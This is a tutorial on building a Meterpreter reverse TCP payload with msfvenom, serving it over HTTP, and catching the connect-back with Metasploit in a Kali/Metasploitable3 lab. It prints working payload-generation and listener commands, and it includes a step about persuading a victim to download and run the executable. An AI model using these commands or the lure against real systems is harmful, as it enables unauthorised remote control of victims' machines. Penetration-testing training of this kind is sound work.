Master the Art of Reverse TCP Payloads with Msfvenom
Table of Contents
- Introduction
- What is a Reverse Shell?
- Setting Up the Environment
- Creating the Payload with Msfvenom
- Transferring the Payload to the Target Machine
- Setting Up the Reverse TCP Listener with Metasploit
- Exploiting the Target Machine
- Establishing a Reverse Shell
- Performing Further Exploitation
- Conclusion
Introduction
In this tutorial, we will explore the concept of reverse shells and learn how to utilize Msfvenom and Metasploit to create a reverse TCP payload and establish a reverse shell connection with the target machine.
What is a Reverse Shell?
A reverse shell, also known as a connect-back, is the opposite of a bind shell. Instead of the attacker setting up a listener on the attacking machine and waiting for the target machine to connect, in a reverse shell scenario, the target machine acts as the client and connects back to the attacker's listener. This allows the attacker to gain remote control over the target machine.
Setting Up the Environment
Before we begin, we need to set up our environment. We will be using a virtual installation of Kali Linux and Metasploitable3. Ensure that your VirtualBox network adapters are set to host-only network mode.
To find the IP address of your Kali machine, open a terminal and type ifconfig
. Look for the IP address assigned to your Ethernet 0 adapter.
For the target machine, open the command prompt, type ipconfig
, and look for the IP address under the local area connection.
To test the connectivity between the Kali machine and the target, open a terminal on the Kali machine and type ping <target IP>
.
Creating the Payload with Msfvenom
To create the reverse TCP payload, we will be using Msfvenom. Open a terminal on your Kali machine and type msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Kali IP> LPORT=5555 -f exe > /root/desktop/shellcodes/reverse_tcp.exe
. Replace <Kali IP>
with the IP address of your Kali machine. This command will create the payload as an executable file and save it in the specified location.
Transferring the Payload to the Target Machine
To transfer the payload to the target machine, we will use a Python 3 Simple HTTP server. Open a terminal in the working folder containing the payload and type python3 -m http.server
. This will start a web server on port 8000.
Next, open a new terminal and type msfconsole
to open Metasploit. Once in the Metasploit console, type use exploit/multi/handler
to select the exploit we need.
Setting Up the Reverse TCP Listener with Metasploit
After selecting the exploit, we need to set the payload by typing set payload windows/meterpreter/reverse_tcp
.
Set the LHOST to the IP address of your Kali machine by typing set lhost <Kali IP>
. Set the LPORT to 5555 by typing set lport 5555
.
To configure the listener, type exploit
.
Exploiting the Target Machine
Now that the listener is set up, we need to convince the victim to download and run the payload. Share the IP address of your web server with the victim and instruct them to visit it. In their web browser, they should enter http://<Kali IP>:8000
and click on the payload file.
Once the victim runs the payload, go back to your Kali machine. You should see a Meterpreter session open.
Establishing a Reverse Shell
To gain remote access to the target machine, we can use the shell
command in Meterpreter. Type shell
and hit enter to obtain a command prompt on the target machine.
Performing Further Exploitation
Now that we have established a reverse shell, we can continue our attack and exploit the target machine further. With the command prompt, we have full control over the target machine and can execute various commands and scripts.
Conclusion
In this tutorial, we have learned how to create a reverse TCP payload using Msfvenom, transfer it to the target machine, set up a reverse TCP listener with Metasploit, and establish a reverse shell connection. This allows us to remotely control the target machine and perform further exploitation. It is important to use this knowledge responsibly and ethically, as unauthorized access to computer systems is illegal.